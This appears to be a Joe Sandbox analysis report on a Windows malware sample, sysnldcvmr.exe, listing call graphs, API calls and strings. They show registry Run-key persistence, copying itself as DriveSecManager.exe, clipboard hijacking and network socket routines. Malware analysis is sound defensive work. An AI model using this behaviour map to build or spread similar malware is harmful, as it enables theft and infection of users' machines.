calls 5612->5613 5614 40143a 5613->5614 5614->5597 5616 40b237 LeaveCriticalSection 5615->5616 5617 40b21f 5615->5617 5616->5597 5618 40bec0 3 API calls 5617->5618 5619 40b22a 5618->5619 5619->5616 5621 40b480 13 API calls 5620->5621 5622 40b561 5621->5622 5622->5597 5624 401339 5623->5624 5632 40139b 5623->5632 5625 401341 SetEvent WaitForSingleObject 5624->5625 5624->5632 5628 401362 5625->5628 5626 40138b 5662 40ab40 shutdown closesocket 5626->5662 5628->5626 5629 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5628->5629 5629->5628 5630 401395 5631 40a1b0 _invalid_parameter 3 API calls 5630->5631 5631->5632 5632->5595 5634 401115 ioctlsocket 5633->5634 5635 4011e4 5634->5635 5641 40113a 5634->5641 5636 40a1b0 _invalid_parameter 3 API calls 5635->5636 5638 4011ea 5636->5638 5637 4011cd WaitForSingleObject 5637->5634 5637->5635 5639 409fe0 9 API calls 5639->5641 5640 401168 recvfrom 5640->5637 5640->5641 5641->5637 5641->5639 5641->5640 5642 4011ad InterlockedExchangeAdd 5641->5642 5644 401000 5642->5644 5645 401014 5644->5645 5646 40103b 5645->5646 5647 409d90 7 API calls 5645->5647 5655 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5646->5655 5647->5646 5649 40105b 5656 401580 5649->5656 5651 4010ec 5651->5641 5652 4010a3 IsBadReadPtr 5654 401071 5652->5654 5653 4010d8 memmove 5653->5654 5654->5651 5654->5652 5654->5653 5655->5649 5657 401592 5656->5657 5658 4015a5 memcpy 5656->5658 5659 409fe0 9 API calls 5657->5659 5661 4015c1 5658->5661 5660 40159f 5659->5660 5660->5658 5661->5654 5662->5630 5887 40ca90 5888 40ad40 4 API calls 5887->5888 5889 40caa3 5888->5889 5890 40caba 5889->5890 5892 40cad0 InterlockedExchangeAdd 5889->5892 5893 40caed 5892->5893 5903 40cae6 5892->5903 5909 40cdc0 5893->5909 5896 40cb0d InterlockedIncrement 5906 40cb17 5896->5906 5897 40b520 13 API calls 5897->5906 5898 40cb40 5916 40aa20 inet_ntoa 5898->5916 5900 40cb4c 5901 40cc10 InterlockedDecrement 5900->5901 5917 40ab40 shutdown closesocket 5901->5917 5903->5890 5904 409fa0 _invalid_parameter 7 API calls 5904->5906 5905 40ccf0 6 API calls 5905->5906 5906->5897 5906->5898 5906->5901 5906->5904 5906->5905 5907 40a1b0 _invalid_parameter 3 API calls 5906->5907 5908 40b570 184 API calls 5906->5908 5907->5906 5908->5906 5910 40cdcd socket 5909->5910 5911 40cde2 htons connect 5910->5911 5912 40ce3f 5910->5912 5911->5912 5913 40ce2a 5911->5913 5912->5910 5914 40cafd 5912->5914 5918 40ab40 shutdown closesocket 5913->5918 5914->5896 5914->5903 5916->5900 5917->5903 5918->5914 5919 406c16 5922 406bf8 5919->5922 5920 406d38 Sleep 5920->5922 5921 406c29 5923 4062c0 4 API calls 5921->5923 5922->5920 5922->5921 5924 406d48 ExitThread 5922->5924 5925 4063a0 4 API calls 5922->5925 5927 406c3a 5923->5927 5925->5922 5926 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5929 406cd6 wsprintfW 5926->5929 5930 406ceb wsprintfW 5926->5930 5927->5926 5928 406c5b 5927->5928 5929->5930 5931 4066b0 51 API calls 5930->5931 5931->5928 5932 40b420 5933 40b423 WaitForSingleObject 5932->5933 5934 40b451 5933->5934 5935 40b43b InterlockedDecrement 5933->5935 5936 40b44a 5935->5936 5936->5933 5937 40ab60 15 API calls 5936->5937 5937->5936 5938 401920 GetTickCount WaitForSingleObject 5939 401ac9 5938->5939 5940 40194d WSAWaitForMultipleEvents 5938->5940 5941 4019f0 GetTickCount 5940->5941 5942 40196a WSAEnumNetworkEvents 5940->5942 5943 401a43 GetTickCount 5941->5943 5944 401a05 EnterCriticalSection 5941->5944 5942->5941 5958 401983 5942->5958 5945 401ab5 WaitForSingleObject 5943->5945 5946 401a4e EnterCriticalSection 5943->5946 5947 401a16 5944->5947 5948 401a3a LeaveCriticalSection 5944->5948 5945->5939 5945->5940 5949 401aa1 LeaveCriticalSection GetTickCount 5946->5949 5950 401a5f InterlockedExchangeAdd 5946->5950 5953 401a29 LeaveCriticalSection 5947->5953 5980 401820 5947->5980 5948->5945 5949->5945 5998 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5950->5998 5951 401992 accept 5951->5941 5951->5958 5953->5945 5955 401a72 5955->5949 5955->5950 5999 40ab40 shutdown closesocket 5955->5999 5958->5941 5958->5951 5959 401cf0 7 API calls 5958->5959 5960 4022c0 5958->5960 5959->5941 5961 4022d2 EnterCriticalSection 5960->5961 5962 4022cd 5960->5962 5963 4022e7 5961->5963 5964 4022fd LeaveCriticalSection 5961->5964 5962->5958 5963->5964 5965 402308 5964->5965 5966 40230f 5964->5966 5965->5958 5967 409d90 7 API calls 5966->5967 5968 402319 5967->5968 5969 402326 getpeername CreateIoCompletionPort 5968->5969 5970 4023b8 5968->5970 5972 4023b2 5969->5972 5973 402366 5969->5973 6002 40ab40 shutdown closesocket 5970->6002 5974 40a1b0 _invalid_parameter 3 API calls 5972->5974 6000 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5973->6000 5974->5970 5975 4023c3 5975->5958 5977 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6001 4021e0 EnterCriticalSection LeaveCriticalSection 5977->6001 5979 4023ab 5979->5958 5981 401830 5980->5981 5990 40190f 5980->5990 5982 40183d InterlockedExchangeAdd 5981->5982 5981->5990 5983 401854 5982->5983 5982->5990 5984 401880 5983->5984 5983->5990 6003 4017a0 EnterCriticalSection 5983->6003 5988 401891 5984->5988 6012 40ab40 shutdown closesocket 5984->6012 5986 4018a7 InterlockedDecrement 5991 401901 5986->5991 5988->5986 5988->5991 5989 402247 5989->5948 5990->5948 5991->5989 5992 402265 EnterCriticalSection 5991->5992 5993 40229c LeaveCriticalSection DeleteCriticalSection 5992->5993 5996 40227d 5992->5996 5994 40a1b0 _invalid_parameter 3 API calls 5993->5994 5994->5989 5995 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5995->5996 5996->5995 5997 40229b 5996->5997 5997->5993 5998->5955 5999->5955 6000->5977 6001->5979 6002->5975 6004 401807 LeaveCriticalSection 6003->6004 6005 4017ba InterlockedExchangeAdd 6003->6005 6004->5983 6006 4017ca LeaveCriticalSection 6005->6006 6007 4017d9 6005->6007 6006->5983 6008 40a1b0 _invalid_parameter 3 API calls 6007->6008 6009 4017fe 6008->6009 6010 40a1b0 _invalid_parameter 3 API calls 6009->6010 6011 401804 6010->6011 6011->6004 6012->5988 6013 40d520 6016 401200 6013->6016 6015 40d542 6017 401314 6016->6017 6018 40121d 6016->6018 6017->6015 6018->6017 6019 409fa0 _invalid_parameter 7 API calls 6018->6019 6020 401247 memcpy htons 6019->6020 6021 4012ed 6020->6021 6022 401297 sendto 6020->6022 6023 40a1b0 _invalid_parameter 3 API calls 6021->6023 6024 4012b6 InterlockedExchangeAdd 6022->6024 6025 4012e9 6022->6025 6027 4012fc 6023->6027 6024->6022 6028 4012cc 6024->6028 6025->6021 6026 40130a 6025->6026 6029 40a1b0 _invalid_parameter 3 API calls 6026->6029 6027->6015 6030 40a1b0 _invalid_parameter 3 API calls 6028->6030 6029->6017 6031 4012db 6030->6031 6031->6015 6032 40e121 6034 40e12a 6032->6034 6033 40e21d 6034->6033 6035 40e193 lstrcmpiW 6034->6035 6036 40e213 SysFreeString 6035->6036 6037 40e1a6 6035->6037 6036->6033 6038 40df10 2 API calls 6037->6038 6040 40e1b4 6038->6040 6039 40e205 6039->6036 6040->6036 6040->6039 6041 40e1e3 lstrcmpiW 6040->6041 6042 40e1f5 6041->6042 6043 40e1fb SysFreeString 6041->6043 6042->6043 6043->6039 5677 405970 GetWindowLongW 5678 405994 5677->5678 5679 4059b6 5677->5679 5680 4059a1 5678->5680 5681 405a27 IsClipboardFormatAvailable 5678->5681 5683 405a06 5679->5683 5684 4059ee SetWindowLongW 5679->5684 5695 4059b1 5679->5695 5687 4059c4 SetClipboardViewer SetWindowLongW 5680->5687 5688 4059a7 5680->5688 5685 405a43 IsClipboardFormatAvailable 5681->5685 5686 405a3a 5681->5686 5682 405ba4 DefWindowProcA 5689 405a0c SendMessageA 5683->5689 5683->5695 5684->5695 5685->5686 5690 405a58 IsClipboardFormatAvailable 5685->5690 5692 405a75 OpenClipboard 5686->5692 5711 405b3c 5686->5711 5687->5682 5691 405b5d RegisterRawInputDevices ChangeClipboardChain 5688->5691 5688->5695 5689->5695 5690->5686 5691->5682 5694 405a85 GetClipboardData 5692->5694 5692->5711 5693 405b45 SendMessageA 5693->5695 5694->5695 5696 405a9d GlobalLock 5694->5696 5695->5682 5696->5695 5697 405ab5 5696->5697 5698 405ac8 5697->5698 5699 405ae9 5697->5699 5700 405afe 5698->5700 5701 405ace 5698->5701 5702 405690 13 API calls 5699->5702 5718 4057b0 5700->5718 5703 405ad4 GlobalUnlock CloseClipboard 5701->5703 5712 405570 5701->5712 5702->5703 5707 405b27 5703->5707 5703->5711 5726 404970 lstrlenW 5707->5726 5710 40a1b0 _invalid_parameter 3 API calls 5710->5711 5711->5693 5711->5695 5713 40557b 5712->5713 5714 405581 lstrlenW 5713->5714 5715 405594 5713->5715 5716 409fa0 _invalid_parameter 7 API calls 5713->5716 5717 4055b1 lstrcpynW 5713->5717 5714->5713 5714->5715 5715->5703 5716->5713 5717->5713 5717->5715 5723 4057bd 5718->5723 5719 4057c3 lstrlenA 5719->5723 5724 4057d6 5719->5724 5720 405630 2 API calls 5720->5723 5721 409fa0 _invalid_parameter 7 API calls 5721->5723 5723->5719 5723->5720 5723->5721 5723->5724 5725 40a1b0 _invalid_parameter 3 API calls 5723->5725 5760 405760 5723->5760 5724->5703 5725->5723 5727 4049a4 5726->5727 5729 404c00 5727->5729 5735 404d30 StrStrW 5727->5735 5756 404bee 5727->5756 5728 404dbb StrStrW 5730 404dd2 StrStrW 5728->5730 5731 404dce 5728->5731 5729->5728 5729->5756 5732 404de5 5730->5732 5733 404de9 StrStrW 5730->5733 5731->5730 5732->5733 5734 404dfc 5733->5734 5742 404e12 5734->5742 5765 4048a0 lstrlenW 5734->5765 5735->5729 5737 404d58 StrStrW 5735->5737 5737->5729 5738 404d80 StrStrW 5737->5738 5738->5729 5739 40539b StrStrW 5740 4053b7 StrStrW 5739->5740 5746 4053ae StrStrW 5739->5746 5741 4053d3 StrStrW 5740->5741 5740->5746 5741->5746 5742->5739 5742->5746 5742->5756 5744 405470 StrStrW 5747 405483 5744->5747 5748 40548a StrStrW 5744->5748 5745 405469 5745->5744 5746->5744 5746->5745 5747->5748 5749 4054a4 StrStrW 5748->5749 5750 40549d 5748->5750 5751 4054b7 5749->5751 5752 4054be StrStrW 5749->5752 5750->5749 5751->5752 5753 4054d1 5752->5753 5754 4054d8 lstrlenA 5752->5754 5753->5754 5755 4054eb GlobalAlloc 5754->5755 5754->5756 5755->5756 5757 405506 GlobalLock 5755->5757 5756->5710 5757->5756 5758 405519 memcpy GlobalUnlock OpenClipboard 5757->5758 5758->5756 5759 405546 EmptyClipboard SetClipboardData CloseClipboard 5758->5759 5759->5756 5761 40576b 5760->5761 5762 405771 lstrlenA 5761->5762 5763 405630 2 API calls 5761->5763 5764 4057a4 5761->5764 5762->5761 5763->5761 5764->5723 5768 4048c4 5765->5768 5766 40490d 5766->5742 5767 404911 iswalpha 5767->5768 5769 40492c iswdigit 5767->5769 5768->5766 5768->5767 5768->5769 5769->5768 5770 40d5f0 5776 401470 5770->5776 5772 40d604 5773 40d615 WaitForSingleObject 5772->5773 5775 40d62f 5772->5775 5774 401330 7 API calls 5773->5774 5774->5775 5777 401483 5776->5777 5778 401572 5776->5778 5777->5778 5779 409d90 7 API calls 5777->5779 5778->5772 5780 401498 CreateEventA socket 5779->5780 5781 4014d5 5780->5781 5782 4014cf 5780->5782 5781->5778 5784 4014e2 htons setsockopt bind 5781->5784 5783 401330 7 API calls 5782->5783 5783->5781 5785 401546 5784->5785 5786 401558 CreateThread 5784->5786 5787 401330 7 API calls 5785->5787 5786->5778 5789 401100 20 API calls _invalid_parameter 5786->5789 5788 40154c 5787->5788 5788->5772 6044 40cc30 6049 40cc90 6044->6049 6047 40cc5e 6048 40cc90 send 6048->6047 6050 40cca1 send 6049->6050 6051 40cc43 6050->6051 6052 40ccbe 6050->6052 6051->6047 6051->6048 6052->6050 6052->6051 6053 40ceb0 6054 40ceb4 6053->6054 6055 40b200 5 API calls 6054->6055 6056 40ced0 WaitForSingleObject 6054->6056 6057 40cad0 198 API calls 6054->6057 6058 40cef5 6054->6058 6055->6054 6056->6054 6056->6058 6057->6054 5790 40ee74 5791 40ee7c 5790->5791 5792 40ef30 5791->5792 5796 40f0b1 5791->5796 5795 40eeb5 5795->5792 5800 40ef9c RtlUnwind 5795->5800 5798 40f0c6 5796->5798 5799 40f0e2 5796->5799 5797 40f151 NtQueryVirtualMemory 5797->5799 5798->5797 5798->5799 5799->5795 5801 40efb4 5800->5801 5801->5795 6059 406a39 6061 4069df 6059->6061 6060 406a0f lstrcmpiW 6060->6061 6061->6060 6062 406b8a FindNextFileW 6061->6062 6063 406a76 PathMatchSpecW 6061->6063 6066 406af4 PathFileExistsW 6061->6066 6072 406570 11 API calls 6061->6072 6064 4069b3 lstrcmpW 6062->6064 6065 406ba6 FindClose 6062->6065 6063->6061 6067 406a97 wsprintfW SetFileAttributesW DeleteFileW 6063->6067 6064->6061 6068 4069c9 lstrcmpW 6064->6068 6069 406bb3 6065->6069 6066->6061 6070 406b0a wsprintfW wsprintfW 6066->6070 6067->6061 6068->6061 6070->6061 6071 406b74 MoveFileExW 6070->6071 6071->6062 6072->6061 5802 40757a ExitThread 5803 40ee7c 5804 40ee9a 5803->5804 5806 40ef30 5803->5806 5805 40f0b1 NtQueryVirtualMemory 5804->5805 5808 40eeb5 5805->5808 5807 40ef9c RtlUnwind 5807->5808 5808->5806 5808->5807 5809 405f7d 5810 405f11 5809->5810 5811 405f7b 5810->5811 5814 405f66 memcpy 5810->5814 5812 40a1b0 _invalid_parameter 3 API calls 5811->5812 5813 405f88 LeaveCriticalSection 5812->5813 5814->5811

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                                                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                                                                                                                                                    • API String ID: 4172876685-2783337622
                                                                                                                                                                                                                                                    • Opcode ID: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                                                                                                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 59 4066b0-4066c5 _chkstk 60 4066c7-4066c9 59->60 61 4066ce-406780 wsprintfW * 5 PathFileExistsW 59->61 62 406bb9-406bbc 60->62 63 406782-4067a3 call 40e770 61->63 64 4067c4-4067d3 PathFileExistsW 61->64 63->64 73 4067a5-4067be SetFileAttributesW DeleteFileW 63->73 65 406874-406883 PathFileExistsW 64->65 66 4067d9-4067e8 PathFileExistsW 64->66 70 406885-40688b 65->70 71 4068ca-4068eb FindFirstFileW 65->71 68 406809-406818 PathFileExistsW 66->68 69 4067ea-406803 SetFileAttributesW DeleteFileW 66->69 76 40681a-40682b CreateDirectoryW 68->76 77 40683c-40684b PathFileExistsW 68->77 69->68 78 4068a5-4068b8 call 406460 70->78 79 40688d-4068a3 call 406460 70->79 74 4068f1-4069a9 71->74 75 406bb3 71->75 73->64 81 4069b3-4069c7 lstrcmpW 74->81 75->62 76->77 82 40682d-406836 SetFileAttributesW 76->82 77->65 83 40684d-406863 CopyFileW 77->83 90 4068bb-4068c4 SetFileAttributesW 78->90 79->90 86 4069c9-4069dd lstrcmpW 81->86 87 4069df 81->87 82->77 83->65 88 406865-40686e SetFileAttributesW 83->88 86->87 91 4069e4-4069f5 86->91 92 406b8a-406ba0 FindNextFileW 87->92 88->65 90->71 93 406a06-406a0d 91->93 94 4069f7-406a00 91->94 92->81 95 406ba6-406bad FindClose 92->95 96 406a3b-406a44 93->96 97 406a0f-406a2c lstrcmpiW 93->97 94->93 95->75 100 406a46 96->100 101 406a4b-406a5c 96->101 98 406a30-406a37 97->98 99 406a2e 97->99 98->96 99->94 100->92 102 406a6d-406a74 101->102 103 406a5e-406a67 101->103 104 406ae4-406aed 102->104 105 406a76-406a93 PathMatchSpecW 102->105 103->102 106 406af4-406b03 PathFileExistsW 104->106 107 406aef 104->107 108 406a95 105->108 109 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 105->109 110 406b05 106->110 111 406b0a-406b5a wsprintfW * 2 106->111 107->92 108->103 109->104 110->92 112 406b74-406b84 MoveFileExW 111->112 113 406b5c-406b72 call 406570 111->113 112->92 113->92
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406768
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                                                                                                                                                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                                                                                                                                                                                                    • API String ID: 2467965697-1256475382
                                                                                                                                                                                                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 599 406570-4065bf CreateDirectoryW wsprintfW FindFirstFileW 600 4065c5-4065d9 lstrcmpW 599->600 601 40669f-4066a2 599->601 602 4065f1 600->602 603 4065db-4065ef lstrcmpW 600->603 605 40666c-406682 FindNextFileW 602->605 603->602 604 4065f3-40663c wsprintfW * 2 603->604 606 406656-406666 MoveFileExW 604->606 607 40663e-406654 call 406570 604->607 605->600 608 406688-406699 FindClose RemoveDirectoryW 605->608 606->605 607->605 608->601
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406595
                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                                                                                                                                                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                                                                                                                                                                                                    • API String ID: 92872011-32713442
                                                                                                                                                                                                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D130: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D14E
                                                                                                                                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
                                                                                                                                                                                                                                                      • Part of subcall function 0040D160: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1603358586-0
                                                                                                                                                                                                                                                    • Opcode ID: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                                                                                                                                                    • Instruction ID: bb6f584dfdc5104726d227d4109236b5a11985639f999f99e629cd7821b1dbc1
